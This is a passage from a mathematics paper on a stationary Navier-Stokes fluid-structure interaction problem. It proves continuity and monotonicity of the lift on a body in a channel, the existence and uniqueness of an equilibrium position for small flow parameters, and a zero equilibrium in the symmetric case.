\tag{5.3}\] Let \(v_{\lambda}:=v-s_{\lambda}\), where \(s_{\lambda}\in W^{1,\infty}(\Omega_{h})\cap H^{2}(\Omega_{h})\) is a solenoidal extension of \(v\) that can be constructed as \(s\) in (2.24) and, hence, it satisfies the estimates (2.25), namely \[\begin{split}\|\nabla s_{\lambda}\|_{L^{2}(\Omega_{h})}& \leq C_{h}|\lambda_{1}-\lambda_{2}|,&\|\Delta s_{ \lambda}\|_{L^{2}(\Omega_{h})}\leq C_{h}|\lambda_{1}-\lambda_{2}|,\\ \|s_{\lambda}\|_{L^{\infty}(\Omega_{h})}&\leq C_{h}| \lambda_{1}-\lambda_{2}|,&\|s_{\lambda}\cdot\nabla s_{\lambda}\|_ {L^{2}(\Omega_{h})}\leq C_{h}|\lambda_{1}-\lambda_{2}|^{2}.\end{split} \tag{5.4}\] We then rewrite (5.3) as \[-\mu\Delta v_{\lambda}+v_{\lambda}\cdot\nabla v_{\lambda}+\nabla q=g,\quad \nabla\cdot v_{\lambda}=0\quad\text{in}\quad\Omega_{h},\qquad v_{\lambda|_{ \partial\Omega_{h}}}=0, \tag{5.5}\] where \[g:=\mu\Delta s_{\lambda}-v\cdot\nabla(u(\lambda_{2})+s_{\lambda})-u(\lambda_{ 2})\cdot\nabla v+s_{\lambda}\cdot\nabla s_{\lambda}-s_{\lambda}\cdot\nabla v.\] From Theorem 2.2 we know that \(v,u(\lambda_{2})\in H^{2}(\Omega_{h})\hookrightarrow L^{\infty}(\Omega_{h})\), so that \(g\in L^{2}(\Omega_{h})\). Moreover, \[\|g\|_{L^{2}(\Omega_{h})} \leq\mu\|\Delta s_{\lambda}\|_{L^{2}(\Omega_{h})}+\big{(}\|\nabla u (\lambda_{2})\|_{L^{2}(\Omega_{h})}+\|\nabla s_{\lambda}\|_{L^{2}(\Omega_{h})} \big{)}\|v\|_{L^{\infty}(\Omega_{h})}\] \[\quad+\|u(\lambda_{2})\|_{L^{\infty}(\Omega_{h})}\|\nabla v\|_{L^ {2}(\Omega_{h})}+\|s_{\lambda}\cdot\nabla s_{\lambda}\|_{L^{2}(\Omega_{h})}+ \|s_{\lambda}\|_{L^{\infty}(\Omega_{h})}\|\nabla v\|_{L^{2}(\Omega_{h})}\] \[\leq C_{h}|\lambda_{1}-\lambda_{2}|+C_{h}(\lambda_{2}+|\lambda_{1}- \lambda_{2}|\big{)}\|v\|_{H^{2}(\Omega_{h})}\] \[\quad+C_{h}\lambda_{2}\|v\|_{H^{2}(\Omega_{h})}+C_{h}|\lambda_{1} -\lambda_{2}|^{2}+C_{h}|\lambda_{1}-\lambda_{2}|\cdot\|v\|_{H^{2}(\Omega_{h})},\] where we used Holder inequality (first step), the estimates (2.7)-(2.8)-(5.4) and the embeddings \(H^{2}\hookrightarrow H^{1},L^{\infty}\) (second step). Thus, by applying Lemma IX.5.1 in [4] to (5.5), we obtain \[\|v_{\lambda}\|_{H^{2}(\Omega_{h})}+\|q\|_{H^{1}(\Omega_{h})}\leq C_{h}| \lambda_{1}-\lambda_{2}|+C_{h}\big{(}\lambda_{2}+|\lambda_{1}-\lambda_{2}| \big{)}\|v\|_{H^{2}(\Omega_{h})}. \tag{5.6}\] Hence, there exists \(\overline{\lambda}\in(0,\Lambda]\) such that, if \(\lambda_{1},\lambda_{2}\in[0,\overline{\lambda})\), the second term in the right-hand side of (5.6) can be absorbed in the left-hand side and \[\|v_{\lambda}\|_{H^{2}(\Omega_{h})}+\|q\|_{H^{1}(\Omega_{h})}\leq C_{h}| \lambda_{1}-\lambda_{2}|, \tag{5.7}\] for some \(C_{h}>0\) also depending on \(\overline{\lambda}\). Since the lift (3.1) is linear with respect to \(u\) and \(p\), we have \[L(\lambda_{1},h)-L(\lambda_{2},h)=-e_{2}\cdot\int_{\partial B_{h}}\mathbb{T}(v, q)n\] with \(v\) and \(q\) defined in (5.2). Therefore, using the Trace Theorem and (5.7), we infer that, for any \(\lambda_{1},\lambda_{2}\in[0,\overline{\lambda})\) and a fixed \(h\in(-H+\delta_{b},H-\delta_{t})\), we have \[|L(\lambda_{1},h)-L(\lambda_{2},h)| \leq C_{h}\left(\|\nabla v\|_{L^{1}(\partial B_{h})}+\|q\|_{L^{1} (\partial B_{h})}\right)\] \[\leq C_{h}\left(\|v\|_{H^{2}(\Omega_{h})}+\|q\|_{H^{1}(\Omega_{h} )}\right)\leq C_{h}|\lambda_{1}-\lambda_{2}|.\] This shows that \(\lambda\mapsto L(\lambda,h)\) is Lipschitzian in \([0,\overline{\lambda})\) for all \(h\in(-H+\delta_{b},H-\delta_{t})\). We now focus on the \(h\)-dependence of \(\phi\) by maintaining \(\lambda\) fixed. Although we prove a slightly stronger result, we state: **Proposition 5.2**.: _Let \(\phi:[0,\Lambda)\times(-H+\delta_{b},H-\delta_{t})\to\mathbb{R}\) be as in (5.1) and let \(\overline{h}=H-\max\{\delta_{b},\delta_{t}\}\). There exist \(h_{0}\in(0,\overline{h})\) and \(\lambda_{0}\in(0,\Lambda]\) such that \(h\mapsto\phi(\lambda,h)\) is continuous and strictly increasing in \([-h_{0},h_{0}]\) for all \(\lambda\in[0,\lambda_{0})\)._ Proof.: Let \(0<r_{1}<r_{2}\) and \(D_{r_{i}}(0)\) be the open disk centered at \((0,0)\) with radius \(r_{i}\). Choose \(h_{0}\in(0,\overline{h})\) in such a way that \(B_{h}\subset D_{r_{1}}(0)\subset D_{r_{2}}(0)\subset R\) whenever \(|h|\leq h_{0}\); in later steps we may need to choose a possibly smaller \(h_{0}\) that, however, we continue calling \(h_{0}\). Let \(\sigma\in W^{2,\infty}(R,\mathbb{R}^{2})\) be defined by \[\sigma(x_{1},x_{2})=F(|x|)e_{2}, \tag{5.8}\] with \(F\equiv 1\) in \([0,r_{1}]\), \(F\equiv 0\) in \([r_{2},+\infty)\) and \(F\in W^{2,\infty}(r_{1},r_{2})\) is the polynomial of third degree such that \(F(r_{1})=1\) and \(F(r_{2})=F^{\prime}(r_{1})=F^{\prime}(r_{2})=0\). For \(h\in[-h_{0},h_{0}]\), with \(h_{0}\) small, we view the fluid domain \(\Omega_{h}\) as a variation of \(\Omega_{0}\) via the diffeomorphism \(\mathrm{Id}+h\sigma\), that is, \[\Omega_{h}=(\mathrm{Id}+h\sigma)(\Omega_{0}).\] In particular, \(\partial B_{h}=\partial B_{0}+he_{2}\) with unit outer normal vector \(n(h)=n(0)\circ(\mathrm{Id}+he_{2})\). Let \(J(h)\) denote the Jacobian matrix of the diffeomorphism \(\mathrm{Id}+h\sigma\), that is, \[J(h)=I+h\frac{F^{\prime}(|x|)}{|x|}\begin{pmatrix}0&0\\ x_{1}&x_{2}\end{pmatrix}\] with \(I\) the \(2\times 2\) identity matrix. Fixing \(\lambda\in[0,\Lambda)\), the lift in (3.1) can be written as \[L(\lambda,h)=-e_{2}\cdot\int_{\partial B_{0}+he_{2}}\mathbb{T}(u(h),p(h))n(h)\] with \(\mathbb{T}(u(h),p(h))=\mathbb{T}(u(\lambda,h),p(\lambda,h))\). Letting \[U(h)=u(h)\circ(\mathrm{Id}+h\sigma),\quad P(h)=p(h)\circ(\mathrm{Id}+h\sigma)\] with \(\sigma\) as in (5.8), we transform the moving boundary integral into a fixed boundary integral, namely \[L(\lambda,h)=-e_{2}\cdot\int_{\partial B_{0}}\mathbb{T}(U(h),P(h))(n(0)\circ( \mathrm{Id}+he_{2})).\] Note that \((U(0),P(0))=(u(0),p(0))\). We now claim that \[h\mapsto(U(h),P(h))\in H^{2}(\Omega_{0})\times H^{1}(\Omega_{0})\text{ belongs to }C^{1}(-h_{0},h_{0}). \tag{5.9}\] To this end, let \(M(h)=(J^{-1}(h))^{T}\) and we rewrite (2.4) as \[-\mu\nabla\cdot(|\det J(h)|M^{T}(h)M(h)\nabla U(h))\] \[+U(h)\cdot|\det J(h)|M(h)\nabla U(h)+\nabla\cdot(|\det J(h)|M(h)P (h))=0\quad\text{in}\quad\Omega_{0},\] \[|\det J(h)|M(h)\nabla\cdot U(h)=0\quad\text{in}\quad\Omega_{0},\] complemented with the same boundary conditions. This can also be expressed as \[\mathcal{H}(h,U(h),P(h))=0 \tag{5.10}\] where \(\mathcal{H}:(-h_{0},h_{0})\times H^{2}(\Omega_{0})\times H^{1}(\Omega_{0}) \to L^{2}(\Omega_{0})\times H^{1}(\Omega_{0})\) is defined by \(\mathcal{H}(h,\xi,\varpi)=(\mathcal{H}_{1}(h,\xi,\varpi),\mathcal{H}_{2}(h, \xi,\varpi))\) with \[\mathcal{H}_{1}(h,\xi,\varpi)= -\mu\nabla\cdot(|\det J(h)|M^{T}(h)M(h)\nabla\xi)\] \[+\xi\cdot|\det J(h)|M(h)\nabla\xi+\nabla\cdot(|\det J(h)|M(h) \varpi),\] \[\mathcal{H}_{2}(h,\xi,\varpi)= |\det J(h)|M(h)\nabla\cdot\xi. \tag{5.11}\] Due to the expression (5.8), we are able to compute \(|\det J(h)|M(h)\) and \(|\det J(h)|M^{T}(h)M(h)\) explicitly at second order for \(h\to 0\). In fact, \[|\det J(h)|=1+h\frac{F^{\prime}(|x|)}{|x|}x_{2},\] \[M(h)=I+\frac{h}{|\det J(h)|}\frac{F^{\prime}(|x|)}{|x|}\begin{pmatrix}0&-x_{1} \\ 0&-x_{2}\end{pmatrix}=I+h\frac{F^{\prime}(|x|)}{|x|}\begin{pmatrix}0&-x_{1}\\ 0&-x_{2}\end{pmatrix}+O(h^{2})\] yield \[\begin{split}&|\det J(h)|M(h)=I+h\frac{F^{\prime}(|x|)}{|x|} \begin{pmatrix}x_{2}&-x_{1}\\ 0&0\end{pmatrix}=:I+hR_{0},\\ &|\det J(h)|M^{T}(h)M(h)\\ &=I+h\frac{F^{\prime}(|x|)}{|x|}\begin{pmatrix}x_{2}&-x_{1}\\ -x_{1}&-x_{2}\end{pmatrix}+h^{2}(F^{\prime}(|x|))^{2}\begin{pmatrix}0&0\\ 0&1\end{pmatrix}+O(h^{3})\\ &=:I+hR_{1}+h^{2}R_{2}+O(h^{3}).\end{split} \tag{5.12}\] Note that the expression of \(|\det J(h)|M(h)\) in (5.12) is exact and obtained without any Taylor expansion for \(h\to 0\). We have that \(\mathcal{H}\) is \(C^{1}\) in a neighborhood of \((0,U(0),P(0))\) since the mappings \(h\mapsto\det J(h)\) and \(h\mapsto M(h)\) are \(C^{1}(-h_{0},h_{0})\) with values in \(C^{1}(R,\mathbb{R}^{4})\). For \(h\in(-h_{0},h_{0})\), we consider the linearized operator \(L=D_{(\xi,\varpi)}\mathcal{H}(h,U(h),P(h))\) defined through the Jacobian matrix of \(\mathcal{H}\). For any \[(\chi,\Pi)\in\mathcal{X}\times\mathcal{Y}:=(H^{2}(\Omega_{0})\cap H_{0}^{1}( \Omega_{0}))\times(H^{1}(\Omega_{0})\cap L_{0}^{2}(\Omega_{0})),\] we have \(L(\chi,\Pi)=(L_{1}(\chi,\Pi),L_{2}(\chi,\Pi))\) with \[L_{1}(\chi,\Pi)= -\mu\nabla\cdot(|\det J(h)|M^{T}(h)M(h)\nabla\chi)+\chi\cdot| \det J(h)|M(h)\nabla U(h)\] \[+U(h)\cdot|\det J(h)|M(h)\nabla\chi+\nabla\cdot(|\det J(h)|M(h) \Pi),\] \[L_{2}(\chi,\Pi)= |\det J(h)|M(h)\nabla\cdot\chi.\] The linear operator \(L\) is bounded from \(\mathcal{X}\times\mathcal{Y}\) into \(L^{2}(\Omega_{0})\times\mathcal{Y}\). To show that \(L\) is an isomorphism, given \((\varphi,\phi)\in L^{2}(\Omega_{0})\times\mathcal{Y}\), we have to prove that there exists a unique solution \((\chi,\Pi)\in\mathcal{X}\times\mathcal{Y}\) to \[-\mu\Delta\chi+\chi\cdot\nabla U(h)+U(h)\cdot\nabla\chi+\nabla\Pi\] \[+h\left(-\mu\nabla\cdot R_{1}\nabla\chi+\chi\cdot R_{0}\nabla U(h )+U(h)\cdot R_{0}\nabla\chi+\nabla\cdot(R_{0}\Pi)\right)\] \[-h^{2}\mu\nabla\cdot R_{2}\nabla\chi+O(h^{3})=\varphi\] in \[\Omega_{0},\] \[\nabla\cdot\chi+hR_{0}\nabla\cdot\chi=\phi\] in \[\Omega_{0}.\] This linear elliptic problem admits a unique solution provided that \[|h|<h_{0}\qquad\text{and}\quad\|U(h)\|_{H^{2}(\Omega_{0})}<r\] for \(h_{0},r>0\) small enough. For \(|h|<h_{0}\) and \(\sigma\) as in (5.8), we have \[c\|u(h)\|_{H^{2}(\Omega_{h})}\leq \|U(h)\|_{H^{2}(\Omega_{0})}\leq C\|u(h)\|_{H^{2}(\Omega_{h})},\] \[c\|p(h)\|_{H^{1}(\Omega_{h})}\leq \|P(h)\|_{H^{1}(\Omega_{0})}\leq C\|p(h)\|_{H^{1}(\Omega_{h})}, \tag{5.13}\] with constants \(0<c\leq C\) independent of \(h\). Then, by taking \(\lambda\in[0,\Lambda)\), the bound (2.8), where the constant \(C_{h}\) is uniformly bounded for \(|h|<h_{0}\), yields the needed smallness condition for \(U(h)\), so that \(L\) is an isomorphism. Therefore, by applying the Implicit Function Theorem to (5.10), we conclude (5.9). Moreover, the derivatives \(U^{\prime}(h)\) and \(P^{\prime}(h)\), whose existence follows from (5.9), satisfy \[L(U^{\prime}(h),P^{\prime}(h))=-\partial_{h}\mathcal{H}(h,U(h),P(h)).\] From (5.12), we know that for any \(h\) (resp. \(h\to 0\)) \[\frac{d}{dh}(|\det J(h)|M(h))=R_{0},\quad\frac{d}{dh}(|\det J(h)|M^{T}(h)M(h)) =R_{1}+2hR_{2}+O(h^{2}).\] Then, (5.11) and the fact that \(L\) is an isomorphism imply that \((U^{\prime}(h),P^{\prime}(h))\) is uniquely determined by the linear elliptic problem \[-\mu\Delta U^{\prime}(h)+U^{\prime}(h)\cdot\nabla U(h)+U(h)\cdot \nabla U^{\prime}(h)+\nabla P^{\prime}(h)\] \[=S_{0}(U(h),P(h))+hS_{1}(U^{\prime}(h),P^{\prime}(h),U(h))+O(h^ {2})\qquad\text{in }\Omega_{0},\] \[\nabla\cdot U^{\prime}(h)=-R_{0}\nabla\cdot U(h)-hR_{0}\nabla \cdot U^{\prime}(h)\qquad\qquad\qquad\qquad\qquad\text{in }\Omega_{0},\] \[(U^{\prime}(h),P^{\prime}(h))\in\mathcal{X}\times\mathcal{Y}, \tag{5.14}\] with \[S_{0}(U(h),P(h)) =\mu\nabla\cdot R_{1}\nabla U(h)-U(h)\cdot R_{0}U(h)-\nabla\cdot (R_{0}P(h)),\] \[S_{1}(U^{\prime}(h),P^{\prime}(h),U(h)) =\mu\nabla\cdot(R_{1}\nabla U^{\prime}(h)+2R_{2}\nabla U(h))-U^{ \prime}(h)\cdot R_{0}\nabla U(h)\] \[\quad-U(h)\cdot R_{0}\nabla U^{\prime}(h)-\nabla\cdot(R_{0}P^{ \prime}(h)).\] For \(h\in(-h_{0},h_{0})\), with \(h_{0}\) small, we have \[\|U^{\prime}(h)\|_{H^{2}(\Omega_{0})}+\|P^{\prime}(h)\|_{H^{1}( \Omega_{0})}\] \[\leq C(\|U^{\prime}(h)\!\cdot\!\nabla U(h)+U(h)\!\cdot\!\nabla U^ {\prime}(h)\!+\!S_{0}(U(h),P(h))\|_{L^{2}(\Omega_{0})}+\|R_{0}\nabla\!\cdot\! U(h)\|_{H^{1}(\Omega_{0})}).\] Since \((U(h),P(h))\in H^{2}(\Omega_{0})\times H^{1}(\Omega_{0})\) due to (5.13) and Theorem 2.2, we bound the right-hand side of the above expression as \[\|U^{\prime}(h)\cdot\nabla U(h)+U(h)\cdot\nabla U^{\prime}(h)\|_{ L^{2}(\Omega_{0})}\leq C\|\nabla U^{\prime}(h)\|_{L^{2}(\Omega_{0})}\|U(h)\|_{H^{2}( \Omega_{0})},\] \[\|S_{0}(U(h),P(h))\|_{L^{2}(\Omega_{0})}+\|R_{0}\nabla\cdot U(h) \|_{H^{1}(\Omega_{0})}\leq C(\|U(h)\|_{H^{2}(\Omega_{0})}+\|P(h)\|_{H^{1}( \Omega_{0})}),\] where in the second inequality we used that \(\sigma\in W^{2,\infty}(R,\mathbb{R}^{2})\), see (5.8). Testing the first equation in (5.14) with \(U^{\prime}(h)\), using (5.13) and (2.13)-(2.14) yield \[\|\nabla U^{\prime}(h)\|_{L^{2}(\Omega_{0})} \leq C(\|U(h)\|_{H^{1}(\Omega_{0})}+\|U(h)\|_{H^{1}(\Omega_{0})} ^{2}+\|P(h)\|_{L^{2}(\Omega_{0})})\] \[\leq C(\|U(h)\|_{H^{1}(\Omega_{0})}+\|U(h)\|_{H^{1}(\Omega_{0})}^ {2}).\] Summarizing, we obtain \[\begin{split}&\|U^{\prime}(h)\|_{H^{2}(\Omega_{0})}+\|P^{\prime}(h) \|_{H^{1}(\Omega_{0})}\\ &\leq C\left(\|U(h)\|_{H^{2}(\Omega_{0})}(1+\|U(h)\|_{H^{1}(\Omega_ {0})}+\|U(h)\|_{H^{1}(\Omega_{0})}^{2})+\|P(h)\|_{H^{1}(\Omega_{0})}\right)\\ &\leq C(\lambda+\lambda^{3})\leq C\lambda\end{split} \tag{5.15}\] for any \(\lambda\in[0,\Lambda)\), where in the second inequality we used (5.13) and (2.7)-(2.8). Finally, we estimate the variation of the lift for small values of \(h\), say \(|h|<h_{0}\). By taking \(h_{1},h_{2}\in(-h_{0},h_{0})\), from the Trace Theorem we have \[\begin{split}&|L(\lambda,h_{1})-L(\lambda,h_{2})|\\ &=\left|\int_{\partial B_{0}}\mathbb{T}(U(h_{1}),P(h_{1}))(n(0) \circ(\mathrm{Id}+h_{1}e_{2}))-\mathbb{T}(U(h_{2}),P(h_{2}))(n(0)\circ(\mathrm{ Id}+h_{2}e_{2}))\right|\\ &\leq\int_{\partial B_{0}}|\mathbb{T}(U(h_{1}),P(h_{1}))-\mathbb{ T}(U(h_{2}),P(h_{2}))|\\ &\quad+\int_{\partial B_{0}}|\mathbb{T}(U(h_{2}),P(h_{2}))|\cdot| n(0)\circ(\mathrm{Id}+h_{1}e_{2})-n(0)\circ(\mathrm{Id}+h_{2}e_{2})|\\ &\leq C(\|U(h_{1})-U(h_{2})\|_{H^{2}(\Omega_{0})}+\|P(h_{1})-P(h_ {2})\|_{H^{1}(\Omega_{0})})\\ &\quad+C(\|U(h_{2})\|_{H^{2}(\Omega_{0})}+\|P(h_{2})\|_{H^{1}( \Omega_{0})})|h_{1}-h_{2}|.\end{split}\] Then, (5.15) and the Mean Value Theorem yield \[\begin{split}&|L(\lambda,h_{1})-L(\lambda,h_{2})|\\ &\leq C\lambda|h_{1}-h_{2}|+C(\|u(h_{2})\|_{H^{2}(\Omega_{h_{2}}) }+\|p(h_{2})\|_{H^{1}(\Omega_{h_{2}})})|h_{1}-h_{2}|\leq C\lambda|h_{1}-h_{2}| \end{split}\] using (5.13) and (2.8) in \(\Omega_{h_{2}}\). Then, the monotonicity property (3.2) ensures that, if \(-h_{0}<h_{2}<h_{1}<h_{0}\), \[\phi(\lambda,h_{1})-\phi(\lambda,h_{2})=f(h_{1})-f(h_{2})+L(\lambda,h_{1})-L( \lambda,h_{2})\geq(\gamma-C\lambda)(h_{1}-h_{2}).\] There exists \(\lambda_{0}\in(0,\Lambda]\) such that \(\gamma-C\lambda_{0}\geq\gamma/2\). Therefore, \(h\mapsto\phi(\lambda,h)\) is continuous and strictly increasing in \([-h_{0},h_{0}]\) (with a possible smaller \(h_{0}\)) for all \(\lambda\in[0,\lambda_{0})\). ### Conclusion of the proof Let \((u(\lambda,h),p(\lambda,h))\) be a solution to (2.4) and let \(\phi(\lambda,h)\) be the corresponding global force in (5.1). Then the triple \((u,p,h)\) is a solution to (3.4) if and only if \[(u(\lambda,h),p(\lambda,h))\text{ solves \eqref{eq:2.4} and }\phi(\lambda,h)=0.\] Therefore, Theorem 3.1 follows once we prove: **Proposition 5.3**.: _Let \(\phi:[0,\Lambda)\times(-H+\delta_{b},H-\delta_{t})\to\mathbb{R}\) be as in (5.1). Then, there exist \(\Lambda_{1}\in(0,\Lambda]\) and a unique \(\mathfrak{h}\in C^{0}[0,\Lambda_{1})\) such that, for all \(\lambda\in[0,\Lambda_{1})\), \(\phi(\lambda,h)=0\) if and only if \(h=\mathfrak{h}(\lambda).\) Moreover, \(\|\mathfrak{h}\|_{L^{\infty}(0,\Lambda_{1})}\leq h_{0}\) with \(h_{0}\) as in Proposition 5.2._ Proof.: We prove the result in two steps, namely by analyzing the behavior of \(\phi\) in two different subregions of \([0,\Lambda)\times(-H+\delta_{b},H-\delta_{t})\). We start by considering the case when \(|h|\) is close to \(0\). Let \(\overline{h}=H-\max\{\delta_{b},\delta_{t}\}\). We claim that there exist \(h_{0}\in(0,\overline{h})\), \(\widetilde{\lambda}\in(0,\Lambda]\) and a unique \(\mathfrak{h}\in C^{0}[0,\widetilde{\lambda})\) such that \[\forall(\lambda,h)\in[0,\widetilde{\lambda})\times[-h_{0},h_{0}]\qquad\phi( \lambda,h)=0\iff h=\mathfrak{h}(\lambda). \tag{5.16}\] To this end, we notice that Theorem 2.2 implies that, when \(\lambda=0\), the unique solution to (2.4) is \((u,p)=(0,0)\), regardless of the value of \(h\in(-H+\delta_{b},H-\delta_{t})\). Hence, \(\phi(0,0)=0\). Moreover, by Proposition 5.2 we know that \(h\mapsto\phi(0,h)\) is continuous and strictly increasing in \([-h_{0},h_{0}]\). These two facts imply that \[\phi(0,-h_{0})<0<\phi(0,h_{0}). \tag{5.17}\] In turn, by Proposition 5.1 we know that \(\lambda\mapsto\phi(\lambda,h)\) is continuous in \([0,\overline{\lambda})\) (with \(\overline{\lambda}\in(0,\Lambda]\)) for all \(h\in[-h_{0},h_{0}]\). By (5.17) and by compactness, we then infer that there exists \(\widetilde{\lambda}\in(0,\min\{\lambda_{0},\overline{\lambda}\}]\) such that \[\phi(\lambda,-h_{0})<0<\phi(\lambda,h_{0})\qquad\forall\lambda\in[0, \widetilde{\lambda}) \tag{5.18}\] and, by invoking again Proposition 5.2, that \(h\mapsto\phi(\lambda,h)\) is continuous and strictly increasing in \([-h_{0},h_{0}]\) for all \(\lambda\in[0,\widetilde{\lambda})\). Together with (5.18), this implies that for all \(\lambda\in[0,\widetilde{\lambda})\) there exists a unique \(\mathfrak{h}(\lambda)\in[-h_{0},h_{0}]\) such that \(\phi(\lambda,\mathfrak{h}(\lambda))=0\). This defines the function \(\lambda\mapsto\mathfrak{h}(\lambda)\) in the interval \([0,\widetilde{\lambda})\). Its continuity follows by the (separated) continuities proved in Propositions 5.1 and 5.2. The proof of (5.16) is so complete. For \(h_{0}\) as in (5.16), we now claim that there exists \(\widehat{\lambda}\in(0,\Lambda]\) such that \[\phi(\lambda,h)\neq 0\qquad\forall(\lambda,h)\in[0,\widehat{\lambda})\times \Big{[}(-H+\delta_{b},H-\delta_{t})\setminus[-h_{0},h_{0}]\Big{]}. \tag{5.19}\] Indeed, from (3.2)-(3.3) we know that there exists \(K_{0}\in(0,K]\) such that \[\begin{split} f(h)\leq-K_{0}(\varepsilon_{b}(h))^{-3/2}\qquad \text{for}\quad h\in(-H+\delta_{b},-h_{0}),\\ f(h)\geq K_{0}\max\{(\varepsilon_{t}(h))^{-3/2},U(\varepsilon_{t}(h) )^{-3}\}\qquad\text{for}\quad h\in(h_{0},H-\delta_{t}),\end{split} \tag{5.20}\] while from Theorem 3.2 there exists (a different) \(C>0\) such that \[\begin{split} L(\lambda,h)\leq C(\varepsilon_{b}(h))^{-3/2}\ \lambda\qquad\text{for}\quad h\in(-H+\delta_{b},-h_{0}),\\ L(\lambda,h)\geq-C\max\{(\varepsilon_{t}(h))^{-3/2},U(\varepsilon_{t }(h))^{-3}\}\ \lambda\qquad\text{for}\quad h\in(h_{0},H-\delta_{t}).\end{split} \tag{5.21}\] Gathering (5.20)-(5.21) together yields \[\begin{split}\phi(\lambda,h)\leq(-K_{0}+C\lambda)(\varepsilon_{b }(h))^{-3/2}\qquad\text{for}\quad h\in(-H+\delta_{b},-h_{0}),\\ \phi(\lambda,h)\geq(K_{0}-C\lambda)\max\{(\varepsilon_{t}(h))^{-3 /2},U(\varepsilon_{t}(h))^{-3}\}\qquad\text{for}\quad h\in(h_{0},H-\delta_{t}). \end{split}\] Then, there exists \(\widehat{\lambda}\in(0,\Lambda]\) such that (5.19) holds. Finally, the statement of the proposition follows from (5.16) and (5.19) by taking \(\Lambda_{1}=\min\{\widetilde{\lambda},\widehat{\lambda}\}\). _Remark 5.4_.: In fact, the proof of (5.19) shows that if \(\lambda>0\) is small, then \[h_{0}<h<H-\delta_{t}\implies\phi(\lambda,h)>0\quad\text{and}\quad-H+\delta_{b }<h<-h_{0}\implies\phi(\lambda,h)<0.\] From a physical point of view, this means that, for small Reynolds numbers, the global force \(\phi=\phi(\lambda,h)\) in (5.1) pushes downwards the body if \(B_{h}\) is close to the upper boundary \(\Gamma_{t}\), whereas it pushes the body upwards if \(B_{h}\) is close to the lower boundary \(\Gamma_{b}\). ## 6. Symmetric configuration We consider here a symmetric framework for (3.4), that is, when \[(x_{1},x_{2})\in\partial B\iff(x_{1},-x_{2})\in\partial B\] and the boundary data are symmetric with respect to the line \(x_{2}=0\). Therefore, the FSI problem (3.4) is modified on \(\Gamma_{b}\) and reads \[\begin{array}{c}-\mu\Delta u+u\cdot\nabla u+\nabla p=0,\qquad\nabla\cdot u= 0\quad\text{in}\quad\Omega_{h}\\ u_{|_{\partial B_{h}}}=0,\quad u_{|_{\Gamma_{b}}}=u_{|_{\Gamma_{t}}}=\lambda Ue _{1},\quad u_{|_{\Gamma_{l}}}=\lambda V_{\text{in}}(x_{2})e_{1},\quad u_{|_{ \Gamma_{r}}}=\lambda V_{\text{out}}(x_{2})e_{1},\\ f(h)=-e_{2}\cdot\int_{\partial B_{h}}\mathbb{T}(u,p)n,\end{array} \tag{6.1}\] with \(\lambda\geq 0\), \(U\in\{0,1\}\) (up to normalization). Here, \(V_{\text{in}},V_{\text{out}}\in W^{2,\infty}(-H,H)\) are now even functions satisfying \[V_{\text{in}}(\pm H)=V_{\text{out}}(\pm H)=U,\qquad\int_{-H}^{H}V_{\text{in}} (x_{2})dx_{2}=\int_{-H}^{H}V_{\text{out}}(x_{2})dx_{2}. \tag{6.2}\] In this symmetric framework, \(\delta_{b}=\delta_{t}=\delta\) and \(h\in(-H+\delta,H-\delta).\) Then, we prove that the unique curve \(\mathfrak{h}(\lambda)\) found in Theorem 3.1 reduces to \(\mathfrak{h}(\lambda)\equiv 0\). **Theorem 6.1**.: _Let \(V_{\text{in}}\), \(V_{\text{out}}\in W^{2,\infty}(-H,H)\) be even functions satisfying (6.2) and \(f\in C^{0}(-H+\delta,H-\delta)\) satisfying \(f(0)=0\) and (3.2)-(3.3) with \(\delta_{b}=\delta_{t}=\delta\). There exists \(\Lambda_{1}\in(0,\Lambda]\) such that for \(\lambda\in[0,\Lambda_{1})\) the FSI problem (6.1) admits a unique strong solution \((u(\lambda,h),p(\lambda,h),h)\in H^{2}(\Omega_{h})\times H^{1}(\Omega_{h}) \times(-H+\delta,H-\delta)\) given by_ \[\big{(}u^{0}(\lambda,0),p^{0}(\lambda,0),0\big{)},\] _where \((u^{0}(\lambda,0),p^{0}(\lambda,0))\) is the unique solution to the first two lines in (6.1) for \(h=0\) and has the following symmetries:_ \[u^{0}_{1}(x_{1},-x_{2})=u^{0}_{1}(x_{1},x_{2}),\quad u^{0}_{2}(x_{1},-x_{2})=- u^{0}_{2}(x_{1},x_{2}),\quad p^{0}(x_{1},-x_{2})=p^{0}(x_{1},x_{2}).\] Proof.: The first step is to obtain the counterpart of Theorem 2.2. The case \(U=0\) is already included in the original statement. When \(U=1\), we construct the cut-off functions \(\zeta_{l}\) and \(\zeta_{r}\) in a slightly different way with Figure 3 replaced by Figure 5. We define the solenoidal extension as in (2.24), which satisfies the boundary conditions in (6.1). With this construction the refined bound (2.7) is replaced by \[\|u\|_{H^{1}(\Omega_{h})}\leq C((\varepsilon_{b}(h))^{-3/2}+(\varepsilon_{t}( h))^{-3/2})\lambda.\] Hence, in both cases \(U\in\{0,1\}\), by arguing as in the proof of Theorem 2.2, we infer that there exists \(\Lambda>0\) such that for \(\lambda\in[0,\Lambda)\) the solution \((u,p)\) to \[\begin{array}{c}-\mu\Delta u+u\cdot\nabla u+\nabla p=0,\qquad\nabla\cdot u= 0\quad\text{in}\quad\Omega_{h}\\ u_{|_{\partial B_{h}}}=0,\quad u_{|_{\Gamma_{b}}}=u_{|_{\Gamma_{t}}}=\lambda Ue _{1},\quad u_{|_{\Gamma_{l}}}=\lambda V_{\text{in}}(x_{2})e_{1},\quad u_{|_{ \Gamma_{r}}}=\lambda V_{\text{out}}(x_{2})e_{1},\end{array} \tag{6.3}\] is unique for any \(h\in(-H+\delta,H-\delta)\). This proves the counterpart of Theorem 2.2. In particular, for \(h=0\) there exists a unique solution \((u^{0},p^{0})\) to (6.3) in \(\Omega_{0}\). Since \(\Omega_{0}\) is symmetric with respect to the line \(x_{2}=0\), the couple \((u^{*},p^{*}):\Omega_{0}\to\mathbb{R}^{2}\times\mathbb{R}\) defined by \[u_{1}^{*}(x_{1},x_{2})=u_{1}^{0}(x_{1},-x_{2}),\quad u_{2}^{*}(x_{1},x_{2})=-u_ {2}^{0}(x_{1},-x_{2}),\quad p^{*}(x_{1},x_{2})=p^{0}(x_{1},-x_{2}),\] also satisfies (6.3) for \(h=0\) (see also [9]). Therefore, by uniqueness \((u^{0},p^{0})=(u^{*},p^{*})\) is also symmetric and, thanks to all these symmetries, we obtain \[L(\lambda,0)=-e_{2}\cdot\int_{\partial B_{0}}\mathbb{T}(u^{0}(\lambda,0),p^{0 }(\lambda,0))n=0,\] which implies \[\phi(\lambda,0)=f(0)=0\qquad\text{for}\quad\lambda\in[0,\Lambda). \tag{6.4}\] From Theorem 3.1 we know that there exist 